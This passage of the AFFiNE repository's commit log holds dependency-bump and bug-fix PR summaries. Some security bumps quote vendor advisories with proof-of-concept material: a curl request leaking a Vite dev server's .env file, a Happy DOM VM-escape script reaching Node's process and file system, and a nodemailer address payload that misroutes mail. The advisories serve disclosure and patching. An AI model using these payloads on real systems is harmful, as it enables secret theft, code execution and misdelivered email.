the recommended preventive measure of running Node.js with `--disallow-code-generation-from-strings` wasn't enough to protect against attackers 
escaping the VM context and accessing process-level functions. Big thanks to [@cristianstaicu](https://redirect.github.com/cristianstaicu) for reporting this!
- The documentation for how to run Happy DOM with JavaScript evaluation enabled in a safer way has been updated. Read more about it in the [Wiki](https://redirect.github.com/capricorn86/happy-dom/wiki/JavaScript-Evaluation-Warning)
</details>
---
### Configuration
📅 **Schedule**: Branch creation - "" (UTC), Automerge - At any time (no schedule defined).
🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied.
♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.
🔕 **Ignore**: Close this PR and you won't be reminded about this update again.
---
This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE).
Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> |
||
|
|
2c44d3abc6 |
chore: bump up vite version to v7 [SECURITY] (#13786)
This PR contains the following updates:
| Package | Change | Age | Confidence |
|---|---|---|---|
| [vite](https://vite.dev) ([source](https://redirect.github.com/vitejs/vite/tree/HEAD/packages/vite)) | [`^6.1.0` -> `^7.0.0`](https://renovatebot.com/diffs/npm/vite/6.3.6/7.1.11) | | |
| [vite](https://vite.dev) ([source](https://redirect.github.com/vitejs/vite/tree/HEAD/packages/vite)) | [`^6.0.3` -> `^7.0.0`](https://renovatebot.com/diffs/npm/vite/6.3.6/7.1.11) | | |
### GitHub Vulnerability Alerts
#### [CVE-2025-62522](https://redirect.github.com/vitejs/vite/security/advisories/GHSA-93m4-6634-74q7)
### Summary
Files denied by [`server.fs.deny`](https://vitejs.dev/config/server-options.html#server-fs-deny) were sent if the URL ended with `\` when the dev server is running on Windows.
### Impact
Only apps that match the following conditions are affected:
- explicitly exposes the Vite dev server to the network (using --host or [`server.host` config option](https://vitejs.dev/config/server-options.html#server-host))
- running the dev server on Windows
### Details
`server.fs.deny` can contain patterns matching against files (by default it includes `.env`, `.env.*`, `*.{crt,pem}` as such patterns). These patterns could be bypassed by using a backslash (`\`). The root cause is that `fs.readFile('/foo.png/')` loads `/foo.png`.
### PoC
```shell
npm create vite@latest
cd vite-project/
echo "secret" > .env
npm install
npm run dev
curl --request-target /.env\ http://localhost:5173
```
---
### Release Notes
<details>
<summary>vitejs/vite (vite)</summary>
### [`v7.1.11`](https://redirect.github.com/vitejs/vite/blob/HEAD/packages/vite/CHANGELOG.md#small-7111-2025-10-20-small)
[Compare Source](https://redirect.github.com/vitejs/vite/compare/v7.1.10...v7.1.11)
##### Bug Fixes
- **dev:** trim trailing slash before `server.fs.deny` check ([#20968](https://redirect.github.com/vitejs/vite/issues/20968)) ([f479cc5]( |
||
|
|
01c164a78a | fix(server): rcat event parse (#13781) | ||
|
|
5c0e3b8a7f |
fix(editor): missing signal of optional flat props (#13762)
Close https://github.com/toeverything/AFFiNE/issues/13750
#### PR Dependency Tree
* **PR #13762** 👈
This tree was auto-generated by [Charcoal](https://github.com/danerwilliams/charcoal)
<!-- This is an auto-generated comment: release notes by coderabbit.ai -->
## Summary by CodeRabbit
* **New Features**
  * Optional block properties are now supported (e.g., flat-table), with default values applied automatically when not set.
* **Bug Fixes**
  * More reliable initialization and syncing of block properties, ensuring defaults appear consistently.
  * Change notifications now correctly reflect updates to optional/defaulted properties.
* **Tests**
  * Added tests verifying optional property behavior, default application, syncing, and change events.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
v0.25.1-beta.0 v0.25.1 |
||
|
|
e4f9d42990 |
fix(core): can not scroll all page list in MacOS 26 (#13763)
Close https://github.com/toeverything/AFFiNE/issues/13754
#### PR Dependency Tree
* **PR #13763** 👈
This tree was auto-generated by [Charcoal](https://github.com/danerwilliams/charcoal)
<!-- This is an auto-generated comment: release notes by coderabbit.ai -->
## Summary by CodeRabbit
* **Style**
  * Updated page layout sizing to no longer force full-height on the docs body, allowing height to adapt to content.
  * Improves natural scrolling and reduces layout constraints in the workspace “All” page.
  * Enhances responsiveness across varying screen sizes by relying on content and container sizing rules.
<!-- end of auto-generated comment: release notes by coderabbit.ai --> |
||
|
|
59d8d0fbae |
fix(editor): text align not work (#13740)
#### PR Dependency Tree
* **PR #13740** 👈
This tree was auto-generated by [Charcoal](https://github.com/danerwilliams/charcoal)
<!-- This is an auto-generated comment: release notes by coderabbit.ai -->
## Summary by CodeRabbit
* **Bug Fixes**
  * Improved reliability of updating block alignment when the current selection isn’t explicitly defined. The editor now retrieves the selection more consistently, reducing cases where alignment controls appeared unresponsive or had no effect.
  * Covers scenarios during initialization or edge cases where selection was previously missed, resulting in smoother editing and fewer false negatives when applying alignment.
  * No changes to visible UI or shortcuts; behavior is simply more consistent.
<!-- end of auto-generated comment: release notes by coderabbit.ai --> |
||
|
|
50f41c2212 |
chore: bump up happy-dom version to v20 [SECURITY] (#13726)
This PR contains the following updates:
| Package | Change | Age | Confidence |
|---|---|---|---|
| [happy-dom](https://redirect.github.com/capricorn86/happy-dom) | [`^18.0.0` -> `^20.0.0`](https://renovatebot.com/diffs/npm/happy-dom/18.0.1/20.0.0) | | |
### GitHub Vulnerability Alerts
#### [CVE-2025-61927](https://redirect.github.com/capricorn86/happy-dom/security/advisories/GHSA-37j7-fg3j-429f)
# Escape of VM Context gives access to process level functionality
## Summary
Happy DOM v19 and lower contains a security vulnerability that puts the owner system at the risk of RCE (Remote Code Execution) attacks. A Node.js VM Context is not an isolated environment, and if the user runs untrusted JavaScript code within the Happy DOM VM Context, it may escape the VM and get access to process level functionality. What the attacker can get control over depends on if the process is using ESM or CommonJS. With CommonJS the attacker can get hold of the `require()` function to import modules. Happy DOM has JavaScript evaluation enabled by default. This may not be obvious to the consumer of Happy DOM and can potentially put the user at risk if untrusted code is executed within the environment.
## Reproduce
### CommonJS (Possible to get hold of require)
```javascript
const { Window } = require('happy-dom');
const window = new Window({ console });

window.document.write(`
  <script>
    const process = this.constructor.constructor('return process')();
    const require = process.mainModule.require;

    console.log('Files:', require('fs').readdirSync('.').slice(0,3));
  </script>
`);
```
### ESM (Not possible to get hold of import or require)
```javascript
const { Window } = require('happy-dom');
const window = new Window({ console });

window.document.write(`
  <script>
    const process = this.constructor.constructor('return process')();

    console.log('PID:', process.pid);
  </script>
`);
```
## Potential Impact
#### Server-Side Rendering (SSR)
```javascript
const { Window } = require('happy-dom');
const window = new Window();

window.document.innerHTML = userControlledHTML;
```
#### Testing Frameworks
Any test suite using Happy-DOM with untrusted content may be at risk.
## Attack Scenarios
1. **Data Exfiltration**: Access to environment variables, configuration files, secrets
2. **Lateral Movement**: Network access for connecting to internal systems. Happy DOM already gives access to the network by fetch, but has protections in place (such as CORS and header validation etc.).
3. **Code Execution**: Child process access for running arbitrary commands
4. **Persistence**: File system access
## Recommended Immediate Actions
1. Update Happy DOM to v20 or above
   - This version has JavaScript evaluation disabled by default
   - This version will output a warning if JavaScript is enabled in an insecure environment
2. Run Node.js with the "--disallow-code-generation-from-strings" if you need JavaScript evaluation enabled
   - This makes sure that evaluation can't be used at process level to escape the VM
   - `eval()` and `Function()` can still be used within the Happy DOM VM without any known security risk
   - Happy DOM v20 and above will output a warning if this flag is not in use
4. If you can't update Happy DOM right now, it's recommended to disable JavaScript evaluation, unless you completely trust the content within the environment
## Technical Root Cause
All classes and functions inherit from [Function](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Function). By walking the constructor chain it's possible to get hold of [Function](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Function) at process level. As [Function](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Function) can evaluate code from strings, it's possible to execute code at process level. Running Node with the "--disallow-code-generation-from-strings" flag protects against this.
---
### Release Notes
<details>
<summary>capricorn86/happy-dom (happy-dom)</summary>
### [`v20.0.0`](https://redirect.github.com/capricorn86/happy-dom/compare/v19.0.2...819d15ba289495439eda8be360d92a614ce22405)
[Compare Source](https://redirect.github.com/capricorn86/happy-dom/compare/v19.0.2...v20.0.0)
### [`v19.0.2`](https://redirect.github.com/capricorn86/happy-dom/releases/tag/v19.0.2)
[Compare Source](https://redirect.github.com/capricorn86/happy-dom/compare/v19.0.1...v19.0.2)
##### :construction\_worker\_man: Patch fixes
- Fixes issue related to CSS pseudo selector `:scope` that didn't work correctly for direct descendants to root - By **[@capricorn86](https://redirect.github.com/capricorn86)** in task [#1620](https://redirect.github.com/capricorn86/happy-dom/issues/1620)
### [`v19.0.1`](https://redirect.github.com/capricorn86/happy-dom/releases/tag/v19.0.1)
[Compare Source](https://redirect.github.com/capricorn86/happy-dom/compare/v19.0.0...v19.0.1)
##### :construction\_worker\_man: Patch fixes
- Fixes issue with sending in URLs as string in `@happy-dom/server-renderer` config using CLI - By **[@capricorn86](https://redirect.github.com/capricorn86)** in task
[#​1908](https://redirect.github.com/capricorn86/happy-dom/issues/1908) ### [`v19.0.0`](https://redirect.github.com/capricorn86/happy-dom/releases/tag/v19.0.0) [Compare Source](https://redirect.github.com/capricorn86/happy-dom/compare/v18.0.1...v19.0.0) ##### 💣 Breaking Changes - Removes support for CommonJS - By **[@​capricorn86](https://redirect.github.com/capricorn86)** in task [#​1730](https://redirect.github.com/capricorn86/happy-dom/issues/1730) - Support for CommonJS is no longer needed as Node.js v18 is deprecated and v20 and above supports loading ES modules from CommonJS using `require()` - Updates Jest to v30 in the `@happy-dom/jest-environment` package - By **[@​capricorn86](https://redirect.github.com/capricorn86)** in task [#​1730](https://redirect.github.com/capricorn86/happy-dom/issues/1730) - Makes Jest packages peer dependencies to make it easier to align versions with the project using `@happy-dom/jest-environment` - By **[@​capricorn86](https://redirect.github.com/capricorn86)** in task [#​1730](https://redirect.github.com/capricorn86/happy-dom/issues/1730) ##### 🎨 Features - Adds a new package called `@happy-dom/server-renderer` - By **[@​capricorn86](https://redirect.github.com/capricorn86)** in task [#​1730](https://redirect.github.com/capricorn86/happy-dom/issues/1730) - This package provides a simple way to statically render (SSG) or server-side render (SSR) your client-side application - Read more in the Wiki under [Server-Renderer](https://redirect.github.com/capricorn86/happy-dom/wiki/Server-Renderer) - Adds support for `import.meta` to the ESM compiler - By **[@​capricorn86](https://redirect.github.com/capricorn86)** in task [#​1730](https://redirect.github.com/capricorn86/happy-dom/issues/1730) - Adds support for the CSS pseudo selector `:scope` - By **[@​capricorn86](https://redirect.github.com/capricorn86)** in task [#​1620](https://redirect.github.com/capricorn86/happy-dom/issues/1620) - Improves support for `MediaList` - By 
**[@​capricorn86](https://redirect.github.com/capricorn86)** in task [#​1730](https://redirect.github.com/capricorn86/happy-dom/issues/1730) - Adds support for `CSSKeywordValue`, `CSSStyleValue`, `StylePropertyMap`, `StylePropertyMap`, `StylePropertyMapReadOnly` - By **[@​capricorn86](https://redirect.github.com/capricorn86)** in task [#​1730](https://redirect.github.com/capricorn86/happy-dom/issues/1730) - Improves debug information in the ESM compiler - By **[@​capricorn86](https://redirect.github.com/capricorn86)** in task [#​1730](https://redirect.github.com/capricorn86/happy-dom/issues/1730) - Adds validation of browser settings when creating a new `Browser` instance - By **[@​capricorn86](https://redirect.github.com/capricorn86)** in task [#​1730](https://redirect.github.com/capricorn86/happy-dom/issues/1730) - Adds support for the browser setting [navigation.beforeContentCallback](https://redirect.github.com/capricorn86/happy-dom/wiki/IBrowserSettings) which makes it possible to inject event listeners or logic before content is loaded to the document when navigating a browser frame - By **[@​capricorn86](https://redirect.github.com/capricorn86)** in task [#​1730](https://redirect.github.com/capricorn86/happy-dom/issues/1730) - Adds support for the browser setting [fetch.requestHeaders](https://redirect.github.com/capricorn86/happy-dom/wiki/IBrowserSettings) which provides with a declarative and simple way to add request headers - By **[@​capricorn86](https://redirect.github.com/capricorn86)** in task [#​1730](https://redirect.github.com/capricorn86/happy-dom/issues/1730) - Adds support for setting an object to [timer.preventTimerLoops](https://redirect.github.com/capricorn86/happy-dom/wiki/IBrowserSettings) which makes it possible to define different settings for `setTimeout()` and `requestAnimationFrame()` - By **[@​capricorn86](https://redirect.github.com/capricorn86)** in task [#​1730](https://redirect.github.com/capricorn86/happy-dom/issues/1730) - Adds 
support for the browser setting [viewport](https://redirect.github.com/capricorn86/happy-dom/wiki/IBrowserSettings) which makes it possible to define a default viewport size - By **[@capricorn86](https://redirect.github.com/capricorn86)** in task [#1730](https://redirect.github.com/capricorn86/happy-dom/issues/1730)
- Adds support for the parameters `beforeContentCallback` and `headers` to `BrowserFrame.goto()`, `BrowserFrame.goBack()`, `BrowserFrame.goForward()`, `BrowserFrame.goSteps()` and `BrowserFrame.reload()` - By **[@capricorn86](https://redirect.github.com/capricorn86)** in task [#1730](https://redirect.github.com/capricorn86/happy-dom/issues/1730)
- Adds support for `PopStateEvent` and trigger the event when navigating the page history using `History.pushState()` - By **[@capricorn86](https://redirect.github.com/capricorn86)** in task [#1730](https://redirect.github.com/capricorn86/happy-dom/issues/1730)
- Use local file paths for virtual server files in stack traces - By **[@capricorn86](https://redirect.github.com/capricorn86)** in task [#1730](https://redirect.github.com/capricorn86/happy-dom/issues/1730)
- Adds support for `ResponseCache.fileSystem.load()` and `ResponseCache.fileSystem.save()` for storing and loading cache from the file system - By **[@capricorn86](https://redirect.github.com/capricorn86)** in task [#1730](https://redirect.github.com/capricorn86/happy-dom/issues/1730)
##### :construction\_worker\_man: Patch fixes
- Fixes a bug in the ESM compiler that caused it to fail to parse certain code - By **[@capricorn86](https://redirect.github.com/capricorn86)** in task [#1730](https://redirect.github.com/capricorn86/happy-dom/issues/1730)
- Disables the same origin policy when navigating a browser frame using `BrowserFrame.goto()` - By **[@capricorn86](https://redirect.github.com/capricorn86)** in task [#1730](https://redirect.github.com/capricorn86/happy-dom/issues/1730)
- Fixes bug where CSS selectors with the pseudos "+" and ">" failed for selectors without arguments - By **[@capricorn86](https://redirect.github.com/capricorn86)** in task [#1730](https://redirect.github.com/capricorn86/happy-dom/issues/1730)
- Adds try and catch to listeners for events dispatched from `XMLHttpRequest` to prevent it from being set to an invalid state if a listener throws an Error - By **[@capricorn86](https://redirect.github.com/capricorn86)** in task [#1730](https://redirect.github.com/capricorn86/happy-dom/issues/1730)
</details>
---
### Configuration
📅 **Schedule**: Branch creation - "" (UTC), Automerge - At any time (no schedule defined).
🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied.
♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.
🔕 **Ignore**: Close this PR and you won't be reminded about this update again.
---
This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE).
Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> |
||
|
|
a35332634a |
fix(core): correct doc icon padding in editor header (#13721)
<!-- This is an auto-generated comment: release notes by coderabbit.ai -->
## Summary by CodeRabbit
* **Style**
  * Refined vertical spacing in the document icon picker header, reducing excess top padding and setting a consistent bottom padding for a cleaner, tighter layout.
  * Improves visual alignment and readability without altering functionality—interactions and behavior remain unchanged.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
v0.25.0 |
||
|
|
0063f039a7 |
feat(server): allow cleanup session for deleted docs (#13720)
<!-- This is an auto-generated comment: release notes by coderabbit.ai -->
## Summary by CodeRabbit
* **Bug Fixes**
  * Resolved occasional errors when removing document links from sessions, ensuring cleanup completes reliably.
  * Improved reliability during maintenance actions by preventing unnecessary validation failures in system-initiated updates, while preserving existing checks for user-initiated changes.
* **Chores**
  * Internal adjustments to the session update flow to better support maintenance operations without affecting user-facing behavior.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
v0.25.0-beta.5 |
||
|
|
d80ca57e94 |
fix(core): change doc icon layout to avoid incorrect color caused by the transform (#13719)
<!-- This is an auto-generated comment: release notes by coderabbit.ai -->
## Summary by CodeRabbit
* **Style**
  * Updated document title styling for improved readability (larger font, increased line height, heavier weight).
  * Refined spacing so titles align correctly when a document icon is present (no extra top padding).
  * Improved emoji rendering by using a consistent font and removing an unnecessary visual artifact.
  * Simplified title container behavior to ensure stable, predictable alignment without placeholder-based shifts.
* **Chores**
  * Minor UI cleanup and consistency adjustments for the icon/title area.
<!-- end of auto-generated comment: release notes by coderabbit.ai --> |
||
|
|
c63e3e7fe6 |
fix(ios): adopt smaller font size for small device (#13715)
This pull request makes minor adjustments to the iOS frontend app, focusing on UI fine-tuning and improving type safety for concurrency. The most notable changes are a small font size adjustment in the paywall badge, marking an enum as `Sendable` for safer concurrency, and removing a StoreKit configuration reference from the Xcode scheme.
UI adjustments:
* Reduced the font size for the badge text in `PackageOptionView` from 12 to 10 for a more refined appearance.
Concurrency and type safety:
* Added the `Sendable` protocol conformance to the `SKUnitCategory` enum to ensure it can be safely used across concurrency boundaries.
Project configuration:
* Removed the `StoreKitConfigurationFileReference` from the `App.xcscheme`, which may help streamline scheme configuration or prevent unnecessary StoreKit file usage during app launch.
<!-- This is an auto-generated comment: release notes by coderabbit.ai -->
## Summary by CodeRabbit
- Style
  - Tweaked paywall option badge text size for a cleaner, more polished look.
- Refactor
  - Improved concurrency safety in underlying models to enhance stability.
- Chores
  - Removed a development-only StoreKit configuration from the iOS debug launch setup.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
v0.25.0-beta.4 |
||
|
|
05d373081a |
fix(server): update email verified at oauth (#13714)
<!-- This is an auto-generated comment: release notes by coderabbit.ai -->
## Summary by CodeRabbit
* **New Features**
  * Automatic email verification when signing in or reconnecting with a linked OAuth provider: if the provider confirms the same email and your account was unverified, your email will be marked as verified automatically.
<!-- end of auto-generated comment: release notes by coderabbit.ai --> |
||
|
|
26fbde6b62 |
fix(core): quick search modal on mobile device (#13694)
When searching on a mobile device, the search modal is wider than the screen, making it hard to use
Now with the fix applied, it is usable
<!-- This is an auto-generated comment: release notes by coderabbit.ai -->
## Summary by CodeRabbit
- **Style**
  - Improved mobile responsiveness of the Quick Search modal. On screens 520px wide or smaller, the modal content now adapts its width instead of enforcing a minimum, reducing overflow and improving readability on small devices.
  - No visual or behavioral changes on larger screens; existing layouts and interactions remain unchanged.
<!-- end of auto-generated comment: release notes by coderabbit.ai --> |
||
|
|
072b5b22df |
fix(core): display affine icon in lit correctly (#13708)
<!-- This is an auto-generated comment: release notes by coderabbit.ai -->
## Summary by CodeRabbit
- New Features
  - Added an alternative icon rendering option for document icons, delivering crisper visuals and consistent emoji/icon display.
- Style
  - Improved icon alignment and sizing within grouped icon buttons for more consistent centering and appearance.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
Co-authored-by: Wu Yue <akumatus@gmail.com> |
||
|
|
3c7461a5ce |
fix(editor): adjust callout emoji spacing based on first child block type (#13712)
- Remove fixed marginTop from emoji container style
- Dynamically calculate emoji marginTop based on first child block type (h1-h6)
- Use model signal to reactively update spacing when children change
- Default to 10px for non-heading blocks
<!-- This is an auto-generated comment: release notes by coderabbit.ai -->
## Summary by CodeRabbit
- Style
  - Improved emoji alignment in callout blocks. The emoji now adjusts its top spacing based on the first line’s heading level, ensuring better vertical alignment with headings (H1–H6) and more consistent visual balance across different callout contents.
  - Maintains existing margins and layout behavior otherwise, resulting in a cleaner, more polished appearance without affecting functionality.
<!-- end of auto-generated comment: release notes by coderabbit.ai --> |
||
|
|
1b859a37c5 |
feat: improve attachment headers (#13709)
<!-- This is an auto-generated comment: release notes by coderabbit.ai -->
## Summary by CodeRabbit
- **New Features**
  - Safer, consistent file downloads with automatic attachment headers and filenames.
  - Smarter MIME detection for uploads (avatars, workspace blobs, Copilot files/transcripts).
  - Sensible default buffer limit when reading uploads.
- **Bug Fixes**
  - Prevents risky content from rendering inline by forcing downloads and adding no‑sniff protection.
  - More accurate content types when original metadata is missing or incorrect.
<!-- end of auto-generated comment: release notes by coderabbit.ai --> |
||
|
|
bf72833f05 |
chore: bump up nodemailer version to v7.0.7 [SECURITY] (#13704)
This PR contains the following updates:
| Package | Change | Age | Confidence |
|---|---|---|---|
| [nodemailer](https://nodemailer.com/) ([source](https://redirect.github.com/nodemailer/nodemailer)) | [`7.0.3` -> `7.0.7`](https://renovatebot.com/diffs/npm/nodemailer/7.0.3/7.0.7) | | |
### GitHub Vulnerability Alerts
#### [GHSA-mm7p-fcc7-pg87](https://redirect.github.com/nodemailer/nodemailer/security/advisories/GHSA-mm7p-fcc7-pg87)
The email parsing library incorrectly handles quoted local-parts containing @. This leads to misrouting of email recipients, where the parser extracts and routes to an unintended domain instead of the RFC-compliant target.
Payload: `"xclow3n@gmail.com x"@internal.domain`
Using the following code to send mail
```
const nodemailer = require("nodemailer");

let transporter = nodemailer.createTransport({
  service: "gmail",
  auth: {
    user: "",
    pass: "",
  },
});

let mailOptions = {
  from: '"Test Sender" <your_email@gmail.com>',
  to: "\"xclow3n@gmail.com x\"@internal.domain",
  subject: "Hello from Nodemailer",
  text: "This is a test email sent using Gmail SMTP and Nodemailer!",
};

transporter.sendMail(mailOptions, (error, info) => {
  if (error) {
    return console.log("Error: ", error);
  }
  console.log("Message sent: %s", info.messageId);
});

(async () => {
  const parser = await import("@sparser/email-address-parser");
  const { EmailAddress, ParsingOptions } = parser.default;
  const parsed = EmailAddress.parse(mailOptions.to /*, new ParsingOptions(true) */);

  if (!parsed) {
    console.error("Invalid email address:", mailOptions.to);
    return;
  }

  console.log("Parsed email:", {
    address: `${parsed.localPart}@${parsed.domain}`,
    local: parsed.localPart,
    domain: parsed.domain,
  });
})();
```
Running the script and seeing how this mail is parsed according to RFC
```
Parsed email: {
  address: '"xclow3n@gmail.com x"@internal.domain',
  local: '"xclow3n@gmail.com x"',
  domain: 'internal.domain'
}
```
But the email is sent to `xclow3n@gmail.com`
### Impact:
- Misdelivery / Data leakage: Email is sent to psres.net instead of test.com.
- Filter evasion: Logs and anti-spam systems may be bypassed by hiding recipients inside quoted local-parts.
- Potential compliance issue: Violates RFC 5321/5322 parsing rules.
- Domain based access control bypass in downstream applications using your library to send mails
### Recommendations
- Fix parser to correctly treat quoted local-parts per RFC 5321/5322.
- Add strict validation rejecting local-parts containing embedded @ unless fully compliant with quoting.
---
### Release Notes
<details>
<summary>nodemailer/nodemailer (nodemailer)</summary>
### [`v7.0.7`](https://redirect.github.com/nodemailer/nodemailer/blob/HEAD/CHANGELOG.md#707-2025-10-05)
[Compare Source](https://redirect.github.com/nodemailer/nodemailer/compare/v7.0.6...v7.0.7)
##### Bug Fixes
- **addressparser:** Fixed addressparser handling of quoted nested email addresses ([1150d99]( |
||
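A caller-side version of the advisory's second recommendation, as an added example (not code from nodemailer, AFFiNE or the advisory): it splits a recipient using RFC 5321 quoting and refuses quoted local-parts that embed `@`, so a disagreement between parsers cannot change the delivery domain. `splitAddrSpec`, `vetRecipient` and the allow-list are hypothetical names; the first sample is the payload quoted in the advisory, the rest are constructed.

```javascript
// Added example: caller-side recipient check (hypothetical helper names).
const ATEXT = /^[A-Za-z0-9!#$%&'*+\/=?^_`{|}~-]+(\.[A-Za-z0-9!#$%&'*+\/=?^_`{|}~-]+)*$/;
const DOMAIN = /^[a-z0-9-]+(\.[a-z0-9-]+)*$/;

// Split one bare addr-spec into local-part and domain using RFC 5321
// quoting: inside double quotes "@" and space are literal characters and a
// backslash escapes the next character.
function splitAddrSpec(input) {
  const s = input.trim();
  const quoted = s[0] === '"';
  let at;
  if (quoted) {
    let i = 1;
    while (i < s.length && s[i] !== '"') i += s[i] === "\\" ? 2 : 1;
    if (i >= s.length) return null; // unterminated quoted-string
    at = i + 1; // the "@" must directly follow the closing quote
  } else {
    at = s.indexOf("@");
    if (at <= 0 || !ATEXT.test(s.slice(0, at))) return null;
  }
  if (s[at] !== "@") return null;
  const domain = s.slice(at + 1).toLowerCase();
  if (!DOMAIN.test(domain)) return null; // also rejects a second "@"
  return { localPart: s.slice(0, at), domain, quoted };
}

// Decide whether a recipient may be handed to the mail library.
function vetRecipient(input, allowedDomains) {
  const parts = splitAddrSpec(input);
  if (!parts) return { ok: false, reason: "unparseable" };
  // Valid per RFC, but parsers disagree on it: refuse rather than guess.
  if (parts.quoted && parts.localPart.includes("@")) {
    return { ok: false, reason: "quoted local-part embeds @" };
  }
  if (!allowedDomains.includes(parts.domain)) {
    return { ok: false, reason: "domain not allowed" };
  }
  return { ok: true, domain: parts.domain };
}

const samples = [
  '"xclow3n@gmail.com x"@internal.domain', // payload from the advisory
  "alice@internal.domain",                 // constructed
  '"a b"@internal.domain',                 // constructed: harmless quoting
  "bob@gmail.com",                         // constructed
];
for (const s of samples) {
  console.log(s, "=>", JSON.stringify(vetRecipient(s, ["internal.domain"])));
}
```

The check belongs before any domain-based access decision, and it stays useful after upgrading to 7.0.7 because other components in the mail path may parse the same string differently.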
|
|
96b3de8ce7 | chore: update docs | ||
|
|
26a59db540 | chore: update docs | ||
|
|
7d0b8aaa81 |
feat(ios): sync paywall with external purchased items (#13681)
This pull request introduces significant improvements to the integration between the paywall feature and the web context within the iOS app. The main focus is on enabling synchronization of subscription states between the app and the embedded web view, refactoring how purchased items are managed, and enhancing the paywall presentation logic. Additionally, some debug-only code has been removed for cleaner production builds.
**Paywall and Web Context Integration**
* Added support for binding a `WKWebView` context to the paywall, allowing the paywall to communicate with the web view for subscription state updates and retrievals (`Paywall.presentWall` now accepts a `bindWebContext` parameter, and `ViewModel` supports binding and using the web context). [[1]](diffhunk://#diff-bce0a21a4e7695b7bf2430cd6b8a85fbc84124cc3be83f3288119992b7abb6cdR10-R32) [[2]](diffhunk://#diff-cb192a424400265435cb06d86b204aa17b4e8195d9dd811580f51faeda211ff0R54-R57) [[3]](diffhunk://#diff-cb192a424400265435cb06d86b204aa17b4e8195d9dd811580f51faeda211ff0L26-R38) [[4]](diffhunk://#diff-1854d318d8fd8736d078f5960373ed440836263649a8193c8ee33e72a99424edL30-R36)
* On paywall dismissal, the app now triggers a JavaScript call to update the subscription state in the web view, ensuring consistency between the app and the web context.
**Purchased Items Refactor**
* Refactored `ViewModel` to distinguish between store-purchased items and externally-purchased items (from the web context), and unified them in a computed `purchasedItems` property. This improves clarity and extensibility for handling entitlements from multiple sources.
* Added logic to fetch external entitlements by executing JavaScript in the web view and decoding the subscription information, mapping external plans to internal product identifiers. [[1]](diffhunk://#diff-df2cb61867b4ff10dee98d534cf3c94fe8d48ebaef3f219450a9fba26725fdcbL99-R137) [[2]](diffhunk://#diff-df2cb61867b4ff10dee98d534cf3c94fe8d48ebaef3f219450a9fba26725fdcbR169-R209)
**Codebase Cleanup**
* Removed debug-only code for shake gesture and debug menu from `AFFiNEViewController`, streamlining the production build.
**API and Model Enhancements**
* Made `SKUnitCategory` and its extensions public to allow broader usage across modules, and introduced a configuration struct for the paywall. [[1]](diffhunk://#diff-742ccf0c6bafd2db6cb9795382d556fbab90b8855ff38dc340aa39318541517dL10-R17) [[2]](diffhunk://#diff-bce0a21a4e7695b7bf2430cd6b8a85fbc84124cc3be83f3288119992b7abb6cdR10-R32)
**Other Minor Improvements**
* Improved constructor formatting for `PayWallPlugin` for readability.
<!-- This is an auto-generated comment: release notes by coderabbit.ai -->
## Summary by CodeRabbit
- New Features
  - Paywall now binds to the in-app web view so web-based subscriptions are recognized alongside App Store purchases.
- Bug Fixes
  - Entitlements combine App Store and web subscription state for more accurate display.
  - Dismissing the paywall immediately updates subscription status to reduce stale states.
  - Improved reliability when presenting the paywall.
- Chores
  - Removed debug shake menu and debug paywall options from iOS builds.
<!-- end of auto-generated comment: release notes by coderabbit.ai --> |
||
|
|
856b69e1f6 |
fix(core): optimize settings dialog's right-side content scroll position (#13236)
In the settings dialog, when switching between different setting items, the right-side content retains the previous scroll position. I think it would be better for the right side to return to the top every time a switch is made, so I submitted this PR.
**before**
https://github.com/user-attachments/assets/a2d10601-6173-41d3-8d68-6fbccc62aaa7
**after**
https://github.com/user-attachments/assets/f240348b-e131-4703-8232-1a07e924162d
<!-- This is an auto-generated comment: release notes by coderabbit.ai -->
## Summary by CodeRabbit
* **Bug Fixes**
  * Ensured the settings dialog always scrolls to the top when the settings state updates, improving user experience when navigating settings.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
Co-authored-by: DarkSky <25152247+darkskygit@users.noreply.github.com> |